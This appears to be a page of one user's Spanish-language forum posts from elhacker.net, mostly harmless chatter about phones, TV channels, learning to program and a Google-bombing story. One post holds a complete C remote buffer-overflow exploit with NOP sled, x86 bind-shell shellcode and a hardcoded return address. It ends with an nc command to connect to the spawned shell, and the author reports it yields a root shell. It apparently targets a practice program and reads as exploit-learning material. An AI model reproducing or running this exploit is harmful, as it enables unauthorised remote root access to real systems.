Mensajes

Para uso personal nada mejor que un Nokia bien grandote o (mi favorito) un Sony Ericsson X8... Móviles pero igualmente útiles: Mientras sean Androids...

Un saludo!

Creía que China iba a colaborar para la paz entre las dos Coreas... Chinos !!!

Está fenomenal, pero no es en directo jeje
Una cosa... algunos canales como GolTV no funcionan...

El proyecto es buenísimo, muchas gracias!

Tanan!!! Fin!!!
La cosa era que la shellcode se copiaba dos veces porque, como bien dice Iván (no lo interpreté bien...), la shellcode se copia dos veces porque memset no le pone un \x00 al final...

Código (c) [Seleccionar] Expandir


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>
#include <sys/socket.h>

int main (int argc, char *argv [])
{
printf ("Vuln 2.0 Exploit 0.1 : Sagrini 2011 : elhacker.net\n");
if (argc != 3)
{
printf ("!!! Use: %s <target_ip> <port>\n\n", argv [0]);
return 1;
}

printf ("Creating socket...\t");
struct sockaddr_in host; int sockfd;
host.sin_family = AF_INET;
host.sin_port = htons (atoi (argv [2]));
host.sin_addr.s_addr = inet_addr (argv [1]);
memset (host.sin_zero, 0, 8);
if ((sockfd=socket (2, 1, 0))==-1)
{
printf ("[FAIL]\n\n");
return 1;
}
else printf ("[OK]\n");

printf ("Conecting target...\t");
if ((connect (sockfd, (struct sockaddr*)&host, sizeof (host)))==-1)
{
printf ("[FAIL]\n\n");
return 1;
}
else printf ("[OK]\n");

printf ("Creating buffer...\t");
char nops [169];
memset (nops, '\x90', 168);
nops [168] = '\x00';
char shellcode [93] = "\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66\xcd\x80\x31\xd2\x52\x66\x68\x13\xd2\x43\x66\x53\x89\xe1\x6a\x10"
"\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43\xb0\x66\xcd\x80"
"\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89"
"\xe1\xb0\x0b\xcd\x80";
char ret [6] = "\x50\xf8\xff\xbf\x90";
char command [265];
strcpy (command, nops);
strcat (command, shellcode);
strcat (command, ret);
printf ("[OK]\n");

printf ("Sending buffer...\t");
if (send (sockfd, &command, strlen (command), 0)==-1)
{
printf ("[FAIL]\n\n");
return 1;
}
else printf ("[OK]\n\n");

printf ("Now you can exec NC [nc -vv %s 5074]\nBe good!\n\n", argv [1]);
return 0;
}


Un saludo!!!

____________________
Modf: Lo acabo de probar en otro sistema, y sólo con desactivar el randomize_va_space y cambiar el RET, todo va perfectamente y me abre una shell con privilegios root en el puerto 5074. Conseguido! Ahora voy a ver por qué no funciona fuera del GDB...

Si sabes Batch ahora deberías leerte algún libro sobre C. Es un lenguaje sencillo que todos pueden aprender .
Recuerda que donde mejor aprenderás será en los libros. Te lo digo de experiencia .

Un saludo!

Por favor, olvídate ya de troyanos y demás. No aprenderás nada con ellos...

Un consejito sería pasarte por la Wiki de elhacker.net. Tiene muchas cosas interesantes, a pesar de estar algo abandonada... Luego podrías leer las chinchetitas de post interesantes, hay algunas cosas muy buenas también. Luego intenta aprender a programar algún lenguaje de scripting sencillito, tipo Batch o demás (Perl es muy bueno también). No te canses de buscar!

Sagrini

[hace que los resultado útiles se alejen de las primeras posiciones]

Esto sí que ha sido interesante!

Hay que ver algunas cosas...

La semana pasada, un grupo de antiabortistas manipuló los resultados de búsqueda de Google para que, cuando se realizase una consulta sobre el término 'murderSSRq ('asesinato', en inglés) mostrase la entrada a la Wikipedia de la palabra 'aborto' en segunda posición. El blog Jezebel, uno de los primeros en alertar sobre el suceso, denunciaba que Google tendría que detener este tipo de prácticas. "Es una táctica antisocial, que hace que los resultado útiles se alejen de las primeras posiciones y prevalezca la información inútil", aseguraba. "Obviamente, esa página de la Wikipedia no es el segundo documento más relevante respecto al asesinato en toda la web de habla inglesa", apuntaban en la web Boing Boing. Pocos días después, esta campaña fue desactivada.

Entonces el aborto no es un asesinato? Qué cabezones!

Pues Wikipedia nos quita el primer puesto al escribir "hacker" en Google debido a que tiene cientos de enlaces a otras páginas. Entonces Wikipedia es lo más importante de la Web? Porque siempre sale la primera

Creo que deberías usar Xl en vez de Xh. Por otra parte no entiendo tu problema...

La verdad es que son carísimos de todos modos, pero yo creo que en un mes o dos saldrán cientos de ofertas...

Eso pasa por usar Facebook  Pues vaya virus